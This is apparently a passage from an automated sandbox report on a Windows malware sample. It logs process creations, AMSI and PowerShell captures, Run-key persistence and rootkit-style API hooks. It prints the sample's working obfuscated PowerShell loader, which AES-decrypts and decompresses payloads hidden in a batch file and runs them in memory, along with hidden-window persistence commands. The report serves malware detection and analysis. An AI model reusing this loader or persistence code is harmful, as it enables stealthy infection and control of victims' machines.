Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=0f51ebcb-4e35-4f5f-b895-e71e4c7e1427HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($vMVwdwXXnratZh,$SlSshRHzgoUjvXmeTqL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$awqsGjGjE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'r'+[Char](98
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C21E3C LoadLibraryA,GetProcAddress,Sleep,18_2_0000022123C21E3C
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123C0A7DD push rcx; retf 003Fh18_3_0000022123C0A7DE
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123BDA7DD push rcx; retf 003Fh18_3_0000022123BDA7DE
Source: C:\Windows\System32\conhost.exeCode function: 19_3_0000013F081DA7DD push rcx; retf 003Fh19_3_0000013F081DA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80B05C push esp; retf 35_2_00007FFD9B80B05D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B805EF7 push esp; retf 35_2_00007FFD9B805EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B8000AD pushad ; iretd 35_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B8D79C9 push ebx; ret 35_2_00007FFD9B8D79CA
Source: C:\Windows\System32\conhost.exeCode function: 36_3_000001FD1777A7DD push rcx; retf 003Fh36_3_000001FD1777A7DE
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_0000017C6DA9A7DD push rcx; retf 003Fh37_3_0000017C6DA9A7DE
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_00000225DC62A7DD push rcx; retf 003Fh38_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exeCode function: 39_3_00000202C0ACA7DD push rcx; retf 003Fh39_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exeCode function: 40_3_000002A6612EA7DD push rcx; retf 003Fh40_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAEDDA7DD push rcx; retf 003Fh41_3_000002BAAEDDA7DE
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAEDAA7DD push rcx; retf 003Fh41_3_000002BAAEDAA7DE
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_3_0000027052A2A7DD push rcx; retf 003Fh42_3_0000027052A2A7DE

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-U7ejKPED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
